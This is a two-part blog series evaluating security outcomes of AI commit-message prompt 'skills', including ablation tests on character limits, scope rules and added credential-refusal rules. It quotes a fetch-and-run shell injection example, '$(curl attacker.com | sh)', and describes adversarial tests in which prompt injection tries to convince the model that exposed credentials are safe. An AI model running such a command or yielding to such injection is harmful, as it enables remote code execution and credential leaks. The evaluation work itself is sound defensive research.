DEV Community: snazar

An ablation study on security outcomes: Which parts of an AI skill actually matter?

snazar — Sat, 31 Jan 2026 22:40:11 +0000

Originally published at faberlens.ai. This is Part 2 — Part 1 here.

In Part 1, we found that epicenter — a skill with zero security rules — outperformed security-focused alternatives on security tests. Our hypothesis: format constraints provide "implicit security."

epicenter achieved +6.0% overall lift despite containing no mentions of credentials, secrets, or security. We hypothesized that its format constraints — particularly the 50-character limit and scope abstraction rules — were doing the heavy lifting.

Hypotheses are cheap. We ran the experiments.

The Hypothesis

Our core claim: format constraints provide implicit security. If true, we should see specific, testable predictions:

Removing the character limit should hurt shell safety (S4) — longer messages can contain injection patterns
Removing scope abstraction rules should hurt path sanitization (S5) — the model will include literal file paths
Adding explicit security rules should improve credential detection (S1) — but may cause over-refusal on safe content

If these predictions hold, we have evidence that epicenter's security comes from structure, not luck. If they don't, our hypothesis is wrong and we need a different explanation.

The Ablation Method

Ablation testing isolates variables by systematically removing them. We created four variants of epicenter, each with one constraint removed or added:

Variant	Change	Tests Hypothesis
epicenter-no-limit	Removed "50-72 characters" rule	Character limit → shell safety
epicenter-no-scope	Removed scope abstraction guidelines	Abstract scopes → path sanitization
epicenter-plus-security	Added explicit credential detection rules	Security rules → over-refusal
epicenter-minimal	Kept only core format rules (36 lines)	Core constraints vs verbose guidance

Each variant was evaluated on relevant security categories using the same protocol: Claude Haiku generation, 3 runs per test.

Result 1: The 50-Character Limit Matters

We removed one line from epicenter:

  // Original:                                                                                                                                                                     
  - Keep under 50-72 characters on first line                                                                                                                                      

  // Changed to:                                                                                                                                                                   
  - Be as descriptive as needed to fully explain the change

Variant	S4 Pass Rate	S4 Lift	Delta
epicenter (original)	83.3%	+20.0%	baseline
epicenter-no-limit	66.7%	+3.3%	-16.7pp

Removing the character limit dropped S4 lift by 16.7 percentage points. A 50-character commit message significantly reduces the likelihood of shell injection patterns like $(curl attacker.com | sh). The constraint doesn't teach the model what to avoid — it structurally limits the output space available for unsafe patterns.

Result 2: Scope Abstraction Rules Matter

We removed the 19-line "Scope Guidelines" section about using abstract module names instead of specific paths.

Variant	S5 Pass Rate	S5 Lift	Delta
epicenter (original)	46.7%	+26.7%	baseline
epicenter-no-scope	16.7%	-3.3%	-30.0pp

Removing scope abstraction dropped S5 lift by 30 percentage points. The instruction to use "specific component/module names" teaches the model to write feat(auth): instead of feat(/clients/acme-corp/auth.js):. Abstract references naturally exclude sensitive path information.

Result 3: Security Rules Are a Double-Edged Sword

We added explicit security instructions at the top of epicenter:

  ## CRITICAL: Security Checks Before Committing                                                                                                                                   

  STOP and refuse to generate a commit message if you detect:                                                                                                                      
  - API keys (patterns like `sk-`, `api_key`, `API_KEY`)                                                                                                                           
  - AWS credentials (`AKIA`, `aws_access_key`)                                                                                                                                     
  - Private keys (`-----BEGIN RSA PRIVATE KEY-----`)                                                                                                                               
  - .env files, credentials.json, secrets.yaml                                                                                                                                     

  If detected: Respond with a warning and DO NOT provide a commit message.

The results tell two very different stories:

Category	epicenter	epicenter-plus-security	Delta
S1: Credential Detection	-10.0%	+33.3%	+43.3pp
S3: Git-Crypt Awareness	+30.0%	-30.0%	-60.0pp

Adding security rules improved credential detection by 43pp but caused complete over-refusal on git-crypt files (-60pp swing). S3 tests whether the model can generate commit messages for git-crypt encrypted files (which are safe to commit). When the skill mentions "encrypted files" as dangerous, the model over-generalizes and refuses all encrypted content — even the safe kind.

Result 4: Less Is More

We stripped epicenter to a 36-line minimal version: just the core format rules.

  # Git Commit Message Format                                                                                                                                                      

  ## Rules                                                                                                                                                                         
  - Keep description under 50 characters                                                                                                                                           
  - Use imperative mood ("add" not "added")                                                                                                                                        
  - No period at the end                                                                                                                                                           
  - Start description with lowercase                                                                                                                                               

  ## Types                                                                                                                                                                         
  feat, fix, docs, refactor, test, chore                                                                                                                                           

  ## Examples                                                                                                                                                                      
  - `feat: add user authentication`                                                                                                                                                
  - `fix: resolve login timeout`

Security Category	epicenter (214 lines)	epicenter-minimal (36 lines)	Winner
S4 (base)	+20.0%	+26.7%	minimal (+6.7pp)
S4-adv	+20.0%	+30.0%	minimal (+10.0pp)
S5 (base)	+26.7%	+16.7%	epicenter (+10.0pp)
S5-adv	+36.7%	+43.3%	minimal (+6.6pp)

The 36-line minimal version outperformed the 214-line original on 3 of 4 security categories tested.

Verbose instructions may dilute the model's focus on critical constraints. When surrounded by 200 lines of PR formatting guidelines, the 50-character rule is one of many. When it's front and center in a 36-line skill, it dominates.

Note: This finding is specific to security evaluations — we haven't tested whether minimal skills perform equally well on formatting or other quality dimensions.

Adversarial Robustness

Format constraints have another advantage: they're evasion-resistant. Attackers can obfuscate credentials to evade pattern matching. They can't obfuscate a character limit — the constraint is on output, not input.

Variant	S4 Base	S4 Adversarial	Collapse?
epicenter	+20.0%	+20.0%	None (stable)
epicenter-minimal	+26.7%	+30.0%	None (improves)

Both variants maintain or improve performance on adversarial tests.

What We Learned

Format constraints provide measurable security. The 50-char limit contributes +16.7pp to shell safety. Scope abstraction contributes +30pp to path sanitization.
Security rules create trade-offs. They improve credential detection (+43pp) but cause over-refusal on safe content (-60pp).
Less can be more for security. A 36-line minimal skill outperformed the 214-line original on most security categories tested.
Constraints are harder to evade. Unlike pattern matching, output constraints are less susceptible to input obfuscation — though not immune.

Implications for Skill Design

If you're building skills, consider:

Use structural constraints when possible. A character limit is more robust than "don't include shell commands."
Test before adding security rules. They may hurt more than they help.
Keep skills focused. Core constraints get diluted in verbose prompts.
Measure, don't assume. Our intuitions about what works are often wrong.

Limitations

Results use Claude Haiku — larger models may handle verbose instructions differently
Security-only evaluation — formatting quality was not tested
Single domain (commit messages) — patterns may not generalize
n=5 skills in the original study — ablation adds depth but not breadth

Full methodology and judge rubrics: faberlens.ai/methodology

Part 1 of this series: The AI Skill Quality Crisis

We tested 5 AI commit-message skills on security. 3 made things worse.

snazar — Sat, 31 Jan 2026 22:22:48 +0000

Originally published at faberlens.ai

Reusable AI components are exploding — skills, MCP servers, templates, subagents. But there's no shared way to answer: "Will this actually help?" We ran a behavioral evaluation study to find out. The results were surprising.

Of 5 commit-message skills we tested from GitHub for security, only 2 showed positive lift over baseline. The other 3 produced negative lift — worse outcomes than using no skill at all. And the top performer? A skill with zero security rules.

Even more striking: in our small sample, static analysis was an unreliable predictor of overall security performance. The skill that "looked" least secure (scoring 42/100 on prompt-only review) achieved the highest lift. Static analysis did predict credential detection well — but failed across other categories. With only 5 skills this is a preliminary signal, not a definitive finding — but it suggests you need to measure what a skill does, not just read what it says.

What is Lift?

To measure whether a skill actually helps, we need a baseline-relative metric. We call it lift:

Lift = Skill Pass Rate − Baseline Pass Rate

Positive lift means the skill adds value. Negative lift means you're better off without it.

In our tests, the baseline (Claude with no skill) achieved 50% overall pass rate across security categories. But this varies dramatically by category:

Category	Baseline	Interpretation
S1: Credential Detection	81.7%	Model already good at obvious credentials
S2: Credential Files	85.0%	Model already good at .env detection
S3: Git-Crypt Awareness	15.0%	Model over-refuses encrypted files
S4: Shell Safety	53.3%	Model sometimes includes unsafe syntax
S5: Path Sanitization	16.7%	Model often leaks sensitive paths

Baseline varies from 15% to 85%. Skills add most value where baseline is weak (S3, S4, S5).

The 5 Skills We Tested

We selected 5 commit-message skills from public GitHub repositories and tested each on 100 security scenarios (5 categories × 2 difficulty levels × 10 tests each). Each test was run 3 times to reduce noise (~1,500 total executions). Generation uses Claude Haiku; results may differ with larger models.

Skill	Length	Approach	Lift
epicenter	8,586 chars	Strict conventional commits with 50-char limit	+6.0%
ilude	8,389 chars	Comprehensive git workflow with security scanning	+1.7%
toolhive	431 chars	Minimal best practices	-1.0%
kanopi	4,610 chars	Balanced commit conventions with security warnings	-4.0%
claude-code-helper	4,376 chars	General-purpose assistant with commit capabilities	-4.3%

The Surprising Winner

The top performer, epicenter, contains zero security instructions. No credential detection. No secret scanning. No warnings about sensitive files.

Meanwhile, kanopi explicitly mentions API keys, secrets, and credentials — and performs worst among the longer skills.

How did a format-focused skill beat security-focused ones on security tests?

Constraint-based safety. epicenter's strict 50-character limit significantly reduces the likelihood of shell metacharacters appearing in output. Its abstract scope requirements discourage sensitive path details. Format constraints provide implicit security without explicit rules.

Important caveat: epicenter's overall lift hides category-specific weaknesses. It scores -10% on S1 (credential detection) and -27% on S2 (credential files) — worse than using no skill at all. Its +6% overall lift comes entirely from dominating S3/S4/S5. If your priority is catching API keys, epicenter is the wrong choice.

Static Analysis Was an Unreliable Predictor

If explicit security rules don't predict success, can we evaluate skills by reading them? We tested this by having Claude rate each skill (0-100) on security awareness based solely on the prompt text.

Skill	Security Mentions	Static Score	Actual Lift
epicenter	None — pure format guidance	42/100	+6.0%
ilude	Explicit scanning rules, git-crypt exceptions	78/100	+1.7%
kanopi	API keys, secrets, credentials, .env files	52/100	-4.0%

Static analysis scores showed weak correlation with actual lift (r = 0.32). epicenter scored lowest on static security analysis (42/100) yet achieved the highest lift (+6.0%).

For shell safety (S4) and git-crypt awareness (S3), we found negative correlations — skills with more explicit rules performed worse:

Category	Correlation	Meaning
S1: Credential Detection	+0.87	Explicit rules help
S4: Shell Safety	-0.68	More rules = worse performance
S3: Git-Crypt	-0.50	More rules = worse performance

With n=5, these correlations are noisy and we're not claiming statistical significance. But the pattern is notable: for some categories, detailed instructions actively backfire.

The Awareness Trap

Our test suite includes base (straightforward) and adversarial variants. Adversarial tests present the same threats but add prompt injection context designed to trick the model into ignoring them.

toolhive shows the most dramatic failure:

Skill	S1 Base	S1 Adversarial	Collapse
toolhive	+16.7%	-23.3%	-40pp
ilude	+33.3%	+3.3%	-30pp

toolhive goes from +16.7% to -23.3% — a 40 percentage point collapse. It handles straightforward cases well but fails when prompt injection tries to convince the model the credentials are safe.

Why doesn't epicenter collapse? Because it doesn't rely on pattern-matching. epicenter's format constraints constrain the output, not the input. No amount of social engineering changes the fact that a 50-character commit message can't contain a full API key.

Why Format Beats Rules

epicenter's success reveals a deeper principle: structural constraints can provide security that explicit rules cannot.

Format Constraint	Security Effect	epicenter Lift
50-char limit	Less room for shell commands like `$(cmd)`	+20% (S4)
Abstract scopes	Discourages client names or file paths	+27% (S5)
No security rules	No over-refusal of encrypted files	+30% (S3)

Instead of listing what to avoid, set structural limits that reduce the likelihood of violations. A 50-character limit doesn't mention shell injection — but it significantly constrains the output space available for unsafe patterns.

Limitations

This study covers one aspect of one domain:

Scope: 5 skills, 1 domain, security-focused tests
Models: Results use Claude Haiku for generation. Larger models may handle verbose instructions differently
Rigor: Results have been human-audited. We're publishing judge prompts, agreement rates, and confidence intervals

We're publishing early because limited data beats no data, and we'd rather be challenged on real numbers than trusted on intuition.

Full methodology and judge rubrics: faberlens.ai/methodology

Part 2 of this series covers ablation testing — isolating exactly which constraints matter: faberlens.ai/blog